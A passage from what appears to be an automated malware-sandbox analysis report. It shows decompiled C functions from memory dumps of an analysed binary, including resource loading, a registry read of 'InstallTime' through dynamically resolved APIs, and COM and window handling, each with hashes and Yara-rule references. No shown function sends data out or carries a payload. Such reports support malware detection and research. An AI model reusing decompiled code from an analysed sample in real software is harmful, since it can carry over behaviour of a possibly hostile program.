Part of subcall function 10015737: strlen.MSVCRT ref: 10015775
Part of subcall function 10015737: #823.MFC42(00000001,?,?,?,?,100154F9,?,?,?,1001555D,?,00000000,00000001,?), ref: 1001577C
Part of subcall function 10015737: strcpy.MSVCRT(00000000,?,00000001,?,?,?,?,100154F9,?,?,?,1001555D,?,00000000,00000001,?), ref: 10015785

#823.MFC42(00000008,?,?,1001555D,?,00000000,00000001,?), ref: 1001552F

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: #823$H_prologMailboxstrcpystrlen
String ID:
API String ID: 57970869-0
Opcode ID: 0581dde5e81432176ad6f7200b3147e5902107d8c4d1ff757d0603b81f92f0a6
Instruction ID: eb3ddfa67e98c28f58cbd6c6d175c941207bd5b7bf2f432afee6c48308facf7e
Opcode Fuzzy Hash: 0581dde5e81432176ad6f7200b3147e5902107d8c4d1ff757d0603b81f92f0a6
Instruction Fuzzy Hash: D801F235600225EBDB14CF28D80279E7AA2EF047A6F144129F816AE2D1DB72C9808B50

Uniqueness

Uniqueness Score: -1.00%

Function 100114FF, Relevance: 6.0, APIs: 4, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E100114FF(void* __ecx, void* __edx, void* __edi) {
				intOrPtr _t13;
				intOrPtr* _t14;
				intOrPtr _t19;
				void* _t24;
				void* _t25;
				signed int* _t27;
				void* _t29;

				_t25 = __edi;
				_t24 = __edx;
				_t13 = E100158AC(E1001A4DA, _t29);
				_push(__ecx);
				_push(0x244);
				L10015806();
				_t19 = _t13;
				 *((intOrPtr*)(_t29 - 0x10)) = _t19;
				 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
				if(_t19 == 0) {
					_t27 = 0;
					__eflags = 0;
				} else {
					_t27 = E1001178B(_t19,  *((intOrPtr*)(_t29 + 0x14)));
				}
				 *(_t29 - 4) =  *(_t29 - 4) | 0xffffffff;
				_t14 = E10010909(_t27, _t24, _t25,  *((intOrPtr*)(_t29 + 8)),  *((intOrPtr*)(_t29 + 0xc)),  *((intOrPtr*)(_t29 + 0x10)));
				 *0x100275bc = _t14;
				if(_t14 == 0) {
					_push(8);
					L10015806();
					 *_t14 = 1;
					 *((intOrPtr*)(_t14 + 4)) = _t27;
				} else {
					_t34 = _t27;
					if(_t27 != 0) {
						E100117D9(_t27, _t34, 1);
					}
					_t14 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t29 - 0xc));
				return _t14;
			}

0x100114ff
0x100114ff
0x10011504
0x10011509
0x1001150b
0x10011510
0x10011516
0x10011518
0x1001151b
0x10011521
0x1001152f
0x1001152f
0x10011523
0x1001152b
0x1001152b
0x10011534
0x10011540
0x10011547
0x1001154c
0x1001155f
0x10011561
0x10011567
0x1001156d
0x1001154e
0x1001154e
0x10011550
0x10011556
0x10011556
0x1001155b
0x1001155b
0x10011574
0x1001157c

APIs

__EH_prolog.LIBCMT ref: 10011504
#823.MFC42(00000244,00000000,?,100115A6,00000000,00000000,00000002,?,?,1000646A,00000000,00000000,?,00000000,00000000,?), ref: 10011510
Mailbox.LIBCMT ref: 10011556

Part of subcall function 1001178B: strlen.MSVCRT ref: 100117B4
Part of subcall function 1001178B: #823.MFC42(00000001,00000000,00000000,?,1001152B,00000000,00000000,?,100115A6,00000000,00000000,00000002,?,?,1000646A,00000000), ref: 100117BB
Part of subcall function 1001178B: strcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,?,1001152B,00000000,00000000,?,100115A6,00000000,00000000,00000002,?), ref: 100117CA

#823.MFC42(00000008,00000000,?,00000000,00000000,?,100115A6,00000000,00000000,00000002,?,?,1000646A,00000000,00000000,?), ref: 10011561

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: #823$H_prologMailboxstrcpystrlen
String ID:
API String ID: 57970869-0
Opcode ID: ab4c3bd6db89e9b6d05eaa3b84954ee06400d6aef2289516f5cee63fb1cdfb66
Instruction ID: e10ea4b3285304c180f63aa9d06ce4667b6a279ca3beb7c1ee31f70daea81f90
Opcode Fuzzy Hash: ab4c3bd6db89e9b6d05eaa3b84954ee06400d6aef2289516f5cee63fb1cdfb66
Instruction Fuzzy Hash: 24012135A00614EFDB18CF64D806BEE7AF2EF447A0F104129F80AAF2D1DBB1D9809B50

Uniqueness

Uniqueness Score: -1.00%

Function 004139D6, Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004139D6(void* __ecx, CHAR* _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t8;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t15;
				void* _t16;
				struct HINSTANCE__* _t17;
				void* _t18;

				_t14 = 0;
				_t11 = 0;
				_t19 = _a4;
				_t18 = __ecx;
				if(_a4 == 0) {
					L4:
					_t16 = E0041358D(_t11, _t18, _t11);
					if(_t11 != 0 && _t14 != 0) {
						FreeResource(_t14);
					}
					return _t16;
				}
				_t17 =  *(E0040E67F(0, 0, _t15, _t19) + 0xc);
				_t8 = FindResourceA(_t17, _a4, 0xf0);
				if(_t8 == 0) {
					goto L4;
				}
				_t9 = LoadResource(_t17, _t8);
				_t14 = _t9;
				if(_t14 != 0) {
					_t11 = LockResource(_t14);
					goto L4;
				}
				return _t9;
			}

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 004139F8
LoadResource.KERNEL32(?,00000000,?,?,?,?,0040C4A0,?,?,0040123C,8E7DE579), ref: 00413A04
LockResource.KERNEL32(00000000,?,?,?,?,0040C4A0,?,?,0040123C,8E7DE579), ref: 00413A11
FreeResource.KERNEL32(00000000,?,?,?,?,0040C4A0,?,?,0040123C,8E7DE579), ref: 00413A2C

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 4e3c77c9b9b666cd702583e4951af05c427353e7159d5c54de967bcdbd13f234
Instruction ID: 4158fac1272381247e57c3a91ade4f76fa434850552cd164254ce42a78dc5ab4
Opcode Fuzzy Hash: 4e3c77c9b9b666cd702583e4951af05c427353e7159d5c54de967bcdbd13f234
Instruction Fuzzy Hash: 10F0F03A3012012F87106FA6AC449BBB6ACDFD07A6705003EBD05E2311DF28CD4182A8

Uniqueness

Uniqueness Score: -1.00%

Function 0040C911, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C911() {
				intOrPtr _t16;
				struct HWND__* _t19;
				intOrPtr _t23;
				intOrPtr* _t28;
				void* _t29;

				_t28 =  *((intOrPtr*)(_t29 - 0x20));
				_t23 =  *((intOrPtr*)(_t29 - 0x24));
				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
					E00415A8F(_t23, 1);
				}
				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
					EnableWindow( *(_t29 - 0x14), 1);
				}
				if( *(_t29 - 0x14) != 0) {
					_t19 = GetActiveWindow();
					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
						SetActiveWindow( *(_t29 - 0x14));
					}
				}
				 *((intOrPtr*)( *_t28 + 0x60))();
				E0040C346(_t23, _t28, 0, _t28, _t34);
				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
					FreeResource( *(_t29 - 0x18));
				}
				_t16 =  *((intOrPtr*)(_t28 + 0x44));
				return E004272B2(_t16);
			}

APIs

EnableWindow.USER32(?,00000001), ref: 0040C931
GetActiveWindow.USER32 ref: 0040C93C
SetActiveWindow.USER32(?,?,00000024,004010BD), ref: 0040C94A
FreeResource.KERNEL32(?,?,00000024,004010BD), ref: 0040C966

Part of subcall function 00415A8F: EnableWindow.USER32(?,?), ref: 00415A9C

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ActiveEnable$FreeResource
String ID:
API String ID: 253586258-0
Opcode ID: 22bd91b732e3fae5fd631a286440de14b97e42acd2df7da6e9b48bea0e6de6cc
Instruction ID: 744bb28800fb384e21909c5947eaf0ac6f02e8d0cf1f7e8d348eb5a8325908a8
Opcode Fuzzy Hash: 22bd91b732e3fae5fd631a286440de14b97e42acd2df7da6e9b48bea0e6de6cc
Instruction Fuzzy Hash: A3F0FF30A00605DFCF21AFA4D9855AEBBB1BF58706F50123AF542722E1CB3A6D40CF59

Uniqueness

Uniqueness Score: -1.00%

Function 10008F92, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 28
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10008F92(CHAR* _a4, int _a8, intOrPtr _a12) {
				int _t7;
				CHAR* _t9;

				_t9 = _a4;
				memset(_t9, 0, _a8);
				E1000D28E(0x80000001, _a12, "InstallTime", 1, _t9, 0, _a8, 0);
				_t7 = lstrlenA(_t9);
				if(_t7 == 0) {
					return lstrcpyA(_t9, 0x10024d44);
				}
				return _t7;
			}

0x10008f96
0x10008f9f
0x10008fbc
0x10008fc5
0x10008fcd
0x00000000
0x10008fd5
0x10008fdd

APIs

memset.MSVCRT ref: 10008F9F

Part of subcall function 1000D28E: memset.MSVCRT ref: 1000D2C3
Part of subcall function 1000D28E: memset.MSVCRT ref: 1000D2D7
Part of subcall function 1000D28E: memset.MSVCRT ref: 1000D2E6
Part of subcall function 1000D28E: LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 1000D2F4
Part of subcall function 1000D28E: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000D30C
Part of subcall function 1000D28E: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 1000D31C
Part of subcall function 1000D28E: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 1000D32C
Part of subcall function 1000D28E: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 1000D339
Part of subcall function 1000D28E: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 1000D346
Part of subcall function 1000D28E: FreeLibrary.KERNEL32(?), ref: 1000D4D2

lstrlenA.KERNEL32(00000032,?,?,?,?,?,?,?,?,?,00000032,?), ref: 10008FC5
lstrcpyA.KERNEL32(00000032,10024D44,?,?,?,?,?,?,?,?,?,00000032,?), ref: 10008FD5

Strings

InstallTime, xrefs: 10008FAF

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressProc$memset$Library$FreeLoadlstrcpylstrlen
String ID: InstallTime
API String ID: 2132864188-139409508
Opcode ID: e4a31631afaf007541deb5ec60ce98c97c351f47087a649c30e30f28e0b1be1e
Instruction ID: 4cb38ae6b46aadf0ac03dfb3b53f20c3755068ac850f60ee53f13f71a87715fd
Opcode Fuzzy Hash: e4a31631afaf007541deb5ec60ce98c97c351f47087a649c30e30f28e0b1be1e
Instruction Fuzzy Hash: 45E01232142624B7FB115F919C45FCE3B6DEF097A1F124000FB1865050D772A2509795

Uniqueness

Uniqueness Score: -1.00%

Function 004242D6, Relevance: 6.0, APIs: 4, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E004242D6(intOrPtr _a4, intOrPtr _a8) {
				long _t4;
				long _t5;
				void* _t7;
				void* _t8;
				void* _t12;

				_t13 = _a4;
				if(_a4 == 0) {
					__eflags =  *0x452a68;
					if( *0x452a68 == 0) {
						_t5 = GetTickCount();
						 *0x452a68 =  *0x452a68 + 1;
						__eflags =  *0x452a68;
						 *0x44f274 = _t5;
					}
					_t4 = GetTickCount() -  *0x44f274;
					__eflags = _t4 - 0xea60;
					if(_t4 > 0xea60) {
						__imp__CoFreeUnusedLibraries();
						_t4 = GetTickCount();
						 *0x44f274 = _t4;
					}
					return _t4;
				}
				return E0042427F(_t7, _t8, _t12, _t13, _a8);
			}

APIs

GetTickCount.KERNEL32 ref: 004242F8
GetTickCount.KERNEL32 ref: 00424305
CoFreeUnusedLibraries.OLE32 ref: 00424314
GetTickCount.KERNEL32 ref: 0042431A

Part of subcall function 0042427F: CoFreeUnusedLibraries.OLE32(00000000,0042435E,00000000), ref: 004242C3
Part of subcall function 0042427F: OleUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0042435E), ref: 004242C9

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CountTick$FreeLibrariesUnused$Uninitialize
String ID:
API String ID: 685759847-0
Opcode ID: 5cbbac071adde92550bb7df493eca704fd6f634656887f5f14a72f499b10bdc5
Instruction ID: 96ee359ccc795dc994d3884e4b924cb2febb2a1018f9c4fa87206d9b434116df
Opcode Fuzzy Hash: 5cbbac071adde92550bb7df493eca704fd6f634656887f5f14a72f499b10bdc5
Instruction Fuzzy Hash: 6BE06D34E04620DACB20EB34FD0421A3BA4FB96302F4045B7E44042160C7B85D84CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0041D05C, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0041D05C(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t106;
				signed int _t118;
				intOrPtr* _t122;
				signed int _t138;
				signed int _t146;
				void* _t149;
				signed int _t150;
				signed int _t174;
				signed int _t176;
				void* _t177;
				void* _t182;
				signed int _t184;
				void* _t185;
				void* _t187;

				_t172 = __edx;
				_t186 = __ecx;
				_t146 = 0;
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					__eflags =  *(__ecx + 0x40);
					if( *(__ecx + 0x40) == 0) {
						L9:
						_t149 = 0;
						__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
						 *(_t186 + 0x38) = _t146;
						if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
							L12:
							_t103 =  *(_t186 + 0x38);
							__eflags = _t103 - _t146;
							if(__eflags > 0) {
								_t176 = 0x30;
								_t172 = _t103 * _t176 >> 0x20;
								_t167 =  ~(__eflags > 0) | _t103 * _t176;
								 *((intOrPtr*)(_t186 + 0x3c)) = E0040A3C7( ~(__eflags > 0) | _t103 * _t176, _t167);
							}
							__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
							_v12 = _t146;
							_v16 = _t146;
							if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
								L21:
								_t150 =  *(_t186 + 0x38);
								_t104 =  *((intOrPtr*)(_t186 + 8));
								 *((intOrPtr*)( *_t104 + 0x10))(_t104, _t150,  *((intOrPtr*)(_t186 + 0x3c)), _t150 << 4, _t146);
								_t106 =  *(_t186 + 0x38);
								__eflags = _t106 - _t146;
								if(__eflags != 0) {
									_t174 = 0x10;
									_t156 =  ~(__eflags > 0) | _t106 * _t174;
									 *(_t186 + 0x40) = E0040A3C7( ~(__eflags > 0) | _t106 * _t174, _t156);
								}
								__eflags =  *(_t186 + 0x38) - _t146;
								if( *(_t186 + 0x38) <= _t146) {
									L26:
									E0041C7B6(_t186);
									return  *((intOrPtr*)( *_t186 + 0x10))();
								} else {
									_t182 = 0;
									__eflags = 0;
									do {
										E004277B0(_t182,  *(_t186 + 0x40) + _t182, 0, 0x10);
										 *(_t182 +  *(_t186 + 0x40)) =  *(_t182 +  *(_t186 + 0x40)) & 0x00000000;
										_t187 = _t187 + 0xc;
										_t146 = _t146 + 1;
										_t182 = _t182 + 0x10;
										__eflags = _t146 -  *(_t186 + 0x38);
									} while (_t146 <  *(_t186 + 0x38));
									goto L26;
								}
							} else {
								_v8 = _t146;
								do {
									_t118 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x14)) + _v8 + 0x24)) + 4));
									__eflags = _t118 - _t146;
									_v20 = _t118;
									if(_t118 == _t146) {
										goto L20;
									}
									_t184 = _v12 * 0x30;
									__eflags = _t184;
									do {
										_t122 = E0040B523( &_v20);
										E0041A3B7(_t172,  *((intOrPtr*)(_t186 + 0x3c)) + _t184,  *((intOrPtr*)(_t186 + 0x14)) + _v8);
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x18) = _v12 << 4;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) & 0x00000000;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) | 0xffffffff;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) | 0xffffffff;
										_v12 = _v12 + 1;
										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x28)) = 1;
										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x2c)) =  *((intOrPtr*)( *_t122 + 0xa0));
										_t184 = _t184 + 0x30;
										__eflags = _v20;
									} while (_v20 != 0);
									_t146 = 0;
									__eflags = 0;
									L20:
									_v16 = _v16 + 1;
									_v8 = _v8 + 0x28;
									__eflags = _v16 -  *((intOrPtr*)(_t186 + 0x10));
								} while (_v16 <  *((intOrPtr*)(_t186 + 0x10)));
								goto L21;
							}
						}
						_t138 =  *((intOrPtr*)(_t186 + 0x14)) + 0x24;
						__eflags = _t138;
						do {
							_t177 =  *_t138;
							_t172 =  *(_t177 + 0xc);
							 *(_t186 + 0x38) =  *(_t186 + 0x38) +  *(_t177 + 0xc);
							_t149 = _t149 + 1;
							_t138 = _t138 + 0x28;
							__eflags = _t149 -  *((intOrPtr*)(_t186 + 0x10));
						} while (_t149 <  *((intOrPtr*)(_t186 + 0x10)));
						goto L12;
					}
					_t185 = 0;
					__eflags =  *(__ecx + 0x38);
					if( *(__ecx + 0x38) <= 0) {
						L8:
						 *(_t186 + 0x40) = _t146;
						goto L9;
					}
					_v12 = 0;
					do {
						__imp__#9( *(__ecx + 0x40) + _v12);
						_v12 = _v12 + 0x10;
						_t185 = _t185 + 1;
						__eflags = _t185 -  *(__ecx + 0x38);
					} while (_t185 <  *(__ecx + 0x38));
					__eflags =  *(__ecx + 0x38);
					if(__eflags > 0) {
						_push( *(__ecx + 0x40));
						E0040A3F2(0, __edx, _t185, __ecx, __eflags);
						_push( *((intOrPtr*)(_t186 + 0x3c)));
						E0040A3F2(0, __edx, _t185, _t186, __eflags);
					}
					goto L8;
				}
				E0041C7B6(__ecx);
				return  *((intOrPtr*)( *__ecx + 0x10))();
			}

APIs

VariantClear.OLEAUT32(?), ref: 0041D095

Strings

(, xrefs: 0041D1A5

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ClearVariant
String ID: (
API String ID: 1473721057-3887548279
Opcode ID: a03a3cd8ec7366f89346372e3ad2e7456f784a50fab4185d881d84a5afe015f1
Instruction ID: ca6c84eec94ce2e380042d160c004058904fac4b8a359609a93fa3fdb8b80d31
Opcode Fuzzy Hash: a03a3cd8ec7366f89346372e3ad2e7456f784a50fab4185d881d84a5afe015f1
Instruction Fuzzy Hash: 69514971A00701AFC764DF69C981AAAB7F1FF48318B504A6EE59287B91C774F981CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0041AD51, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0041AD51(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _v4;
				void* _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v56;
				char _v60;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				short _v84;
				signed int _v88;
				signed int _v92;
				short _v96;
				short _v100;
				signed int _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v116;
				intOrPtr _v120;
				char _v124;
				signed int* _t78;
				signed int _t86;
				intOrPtr _t92;
				intOrPtr* _t109;
				intOrPtr* _t111;
				intOrPtr* _t113;
				signed int _t115;
				signed int _t123;
				signed int _t126;
				intOrPtr* _t148;
				void* _t150;

				_push(0x70);
				E004271DA(E0043AAFD, __ebx, __edi, __esi);
				_t150 = __ecx;
				_t78 =  *(__ecx + 0x50);
				_t123 = 0;
				_t126 = 0 | _t78 != 0x00000000;
				if(_t126 != 0) {
					_push( &_v16);
					_push(0x441ea4);
					_v16 = 0;
					_t126 =  *_t78;
					_push(_t78);
					_v20 = 0;
					if( *_t126() < 0) {
						L18:
						return E004272B2(_v20);
					} else {
						if((0 | _v16 != 0x00000000) == 0) {
							goto L3;
						} else {
							_v120 = __ecx + 0xc8;
							_v112 = __ecx + 0xd8;
							_v108 = __ecx + 0xdc;
							_v124 = 0x40;
							_v116 = 0;
							_v88 = 0;
							_v76 = 0;
							_v72 = 0;
							E00422542( &_v36);
							_t92 =  *((intOrPtr*)(__ecx + 0x20));
							_v4 = 0;
							if(_t92 == 0) {
								goto L3;
							} else {
								_t148 =  *((intOrPtr*)(_t92 + 0x20));
								_v104 = 0;
								if(_t148 == 0) {
									goto L3;
								} else {
									do {
										_t30 = _t123 + 0x43f360; // 0xfffffd3b
										 *((intOrPtr*)( *_t148 + 0x104))(_t150,  *_t30,  &_v36);
										if(_v28 != 0) {
											_t33 = _t123 + 0x43f364; // 0x4
											_v104 = _v104 |  *_t33;
										}
										_t123 = _t123 + 8;
									} while (_t123 < 0x40);
									 *((intOrPtr*)( *_t148 + 0x104))(_t150, 0xfffffd40,  &_v36);
									_v100 = _v28;
									 *((intOrPtr*)( *_t148 + 0x104))(_t150, 0xfffffd43,  &_v36);
									_v96 = _v28;
									 *((intOrPtr*)( *_t148 + 0x104))(_t150, 0xfffffd34,  &_v36);
									_v84 = _v28;
									 *((intOrPtr*)( *_t148 + 0x104))(_t150, 0xfffffd3f,  &_v36);
									_v80 = _v28;
									 *((intOrPtr*)( *_t148 + 0x104))(_t150, 0xfffffd41,  &_v36);
									_t109 = _v28;
									_push( &_v92);
									_push(0x441ef4);
									_push(_t109);
									if( *((intOrPtr*)( *_t109))() < 0) {
										_v92 = _v92 & 0x00000000;
									}
									_t111 = _v16;
									_push( &_v60);
									_push( &_v124);
									_v60 = 0x18;
									_push(_t111);
									if( *((intOrPtr*)( *_t111 + 0xc))() >= 0) {
										 *((intOrPtr*)(_t150 + 0x70)) = _v56;
										 *((intOrPtr*)(_t150 + 0x60)) = _v48;
										 *((intOrPtr*)(_t150 + 0x64)) = _v44;
										_v20 = 1;
									}
									_t113 = _v16;
									 *((intOrPtr*)( *_t113 + 8))(_t113);
									_t115 = _v92;
									if(_t115 != 0) {
										 *((intOrPtr*)( *_t115 + 8))(_t115);
									}
									__imp__#9( &_v36);
									goto L18;
								}
							}
						}
					}
				} else {
					L3:
					_push(_t126);
					_t4 =  &_v24; // 0x44e938
					_v24 = 0x44e9d0;
					E00429326(_t4, 0x448990);
					asm("int3");
					_t86 = _t126;
					 *((intOrPtr*)(_t86 + 4)) = 1;
					return _t86;
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 0041AD58

Strings

@, xrefs: 0041ADBB

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3
String ID: @
API String ID: 431132790-2766056989
Opcode ID: 2fac4ab0c378b0e0d966fbcd751ca674ea681492086c07b077397cad4b04b03e
Instruction ID: eb92c176639828ccfb454a0326971ede6c8f8d43daeed02953847f32bfd48aa2
Opcode Fuzzy Hash: 2fac4ab0c378b0e0d966fbcd751ca674ea681492086c07b077397cad4b04b03e
Instruction Fuzzy Hash: 1051E670A012199FDB14CFA8C984AEEB7F9BF48304F24456EE416EB250E774A985CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0041358D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0041358D(void* __ebx, signed short __ecx, signed short* _a4) {
				signed int _v8;
				signed short _v12;
				signed short _v16;
				signed short _v20;
				signed short* _v48;
				void _v52;
				void* _v56;
				void* __ebp;
				signed short _t33;
				signed short _t34;
				intOrPtr _t48;
				signed int _t50;
				signed short _t55;
				signed short* _t58;
				signed short* _t60;
				signed short* _t62;
				long _t63;
				void* _t64;
				void* _t65;

				_t49 = __ecx;
				_t47 = __ebx;
				_t58 = _a4;
				_t55 = __ecx;
				_v12 = __ecx;
				_v8 = 1;
				if(_t58 == 0) {
					L18:
					E0041176E(_t47, _t49, _t54,  *(_t55 + 0x20), 0x364, 0, 0, 0, 0);
					L19:
					return _v8;
				}
				_push(__ebx);
				_t48 = __imp__SendDlgItemMessageA; // 0x774147e0
				while(1) {
					_t33 =  *_t58 & 0x0000ffff;
					if(_t33 == 0) {
						break;
					}
					_t60 =  &(_t58[1]);
					_t49 = _t33 & 0x0000ffff;
					_t34 =  *_t60 & 0x0000ffff;
					_t62 =  &(_t60[1]);
					_t54 =  *_t62;
					_t63 =  &(_t62[2]);
					_v16 = _t49;
					_v20 =  *_t62;
					if(_t34 == 0x1234) {
						L9:
						_t50 = 8;
						memset( &_v52, 0, _t50 << 2);
						_t65 = _t65 + 0xc;
						_v52 = _v52 | 0xffffffff;
						_v56 = 1;
						E00401EE0(_t48, _t64, _t63);
						_v48 = _a4;
						if(SendDlgItemMessageA( *(_v12 + 0x20), _v16 & 0x0000ffff, 0x401, 0,  &_v56) == 0xffffffff) {
							_v8 = _v8 & 0x00000000;
						}
						_t49 =  &(_a4[0xfffffffffffffff8]);
						E00401E60( &(_a4[0xfffffffffffffff8]), _t54);
						_t55 = _v12;
						L16:
						_t58 = _t63 + _v20;
						if(_v8 != 0) {
